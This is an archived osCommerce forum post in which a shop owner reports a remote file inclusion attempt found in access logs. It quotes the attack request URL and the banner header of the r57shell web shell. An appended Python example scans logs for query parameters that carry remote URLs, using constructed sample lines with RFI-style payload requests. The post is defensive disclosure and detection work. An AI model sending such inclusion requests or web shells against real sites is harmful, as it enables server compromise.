
osCommerce

The e-commerce.

Warning: a new attack seen today


klktrk


Going through my access logs today, I saw this:

http://www.mysite.com/shop/index.php?cPath...m/aLiiF.txt?cmd

 

The double ? mark, as well as the URL, alerted me to something not good going on. So I went to the site http://medan-irc.com/aLiif.txt and saw a pretty full-fledged attack script posted. It looks to my untrained eye that it is designed to cause a buffer overflow and then grab data from the database.

 

I assume MS2 sites are probably not vulnerable to this attack, but wanted to document it here, in case anyone sees anything similar, or in case this is entirely new to the community.

 

I don't want to spread the attack script, so I'll just paste in the first few lines of it as a "signature." I have a copy of it downloaded for record keeping. I wrote to the hosting company that hosts the attacker's site and alerted them to the issue.

 

First 35 lines of the attack script:

<?php
/******************************************************************************************************/
/*
/*                          #           #    #        #    #          #
/*                          #           #   #          #   #          #
/*                          #          #    #          #    #         # 
/*                          #          #   ##   ####   ##   #         #
/*                          #       # ##   ##  #    #  ##   ## #      #
/*                          #       # ##   ##  #    #  ##   ## #      #
/*                          #       ####   ##   #  #   ##   ####      #
/*                          #         ###   ############   ###        #
/*                          #         ##########    ##########        # 
/*                          #              ######  ######             # 
/*                          #       ######## ## #### ## #######       #
/*                          #      ###   ##  ####  ####  ##   ###     #
/*                          #      ###   ##  ##  ##  ##  ##   ###     #
/*                          #       ###   #  ## #### ##  #   ###      #
/*                          #       ###   ##  ## ## ##  ##   ###      # 
/*                          #        ##    #   ##  ##   #    ##       #
/*                          #         ##   #    ####   #    ##        #
/*                          #          ##                  ##         #
/*
/*
/*
/*  r57shell.php - ������ �� ��� ����������� ��� ��������� ��������� ������� �� ������� ����� �������
/*  �� ������ ������� ����� ������ �� ����� �����: http://rst.void.ru
/*  ������: 1.3 (05.03.2006)
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~*/
/*  ��������� ������������� �� ������ � ����: blf, phoenix, virus, NorD � ���� ������ �� RST/GHC.
/*  ���� � ��� ���� �����-���� ���� �� ������ ���� ����� ������� ������� �������� � ������ �� ������
/*  �� [email protected]. ��� ����������� ����� �����������.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~*/
/*  ©oded by 1dt.w0lf
/*  RST/GHC http://rst.void.ru , http://ghc.ru
/*  ANY MODIFIED REPUBLISHING IS RESTRICTED

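The request in the post stands out because its query string carries a remote URL, which is where the second `?` comes from. The following is an added example, not part of the original post, that scans access logs for that pattern; the Apache combined log format is assumed, and the sample lines, hosts and the `page` and `lang` parameter names are constructed.

```python
import re
from urllib.parse import parse_qsl

# Client, request target and status from an Apache "combined" log entry (assumed format).
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A parameter value that is itself a remote URL.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_remote_url_params(line):
    """Return one finding per query parameter whose value is a remote URL."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, target, status = m.groups()
    # Everything after the first "?" is the query; later "?" stay inside values.
    query = target.partition("?")[2]
    findings = []
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            findings.append({
                "client": client,
                "param": name,
                "value": value,
                # The second "?" the post noticed belongs to the embedded URL.
                "second_qmark": "?" in value,
                "status": int(status),
            })
    return findings

def scan(lines):
    """Run the check over many log lines and collect all findings."""
    return [f for line in lines for f in find_remote_url_params(line)]

# Constructed sample log lines (hosts, paths and parameter values are made up).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2006:10:01:02 +0000] "GET /shop/index.php?cPath=22_31 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2006:10:05:44 +0000] "GET /shop/index.php?page=http://files.example/a.txt?cmd HTTP/1.1" 200 412 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [12/Mar/2006:10:05:45 +0000] "GET /shop/index.php?lang=HTTP%3A%2F%2Ffiles.example%2Fa.txt%3F HTTP/1.1" 404 208 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Legitimate parameters that hold URLs (redirect targets, for example) will also match, so treat hits as leads to review rather than confirmed compromises.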

Archived

This topic is now archived and is closed to further replies.
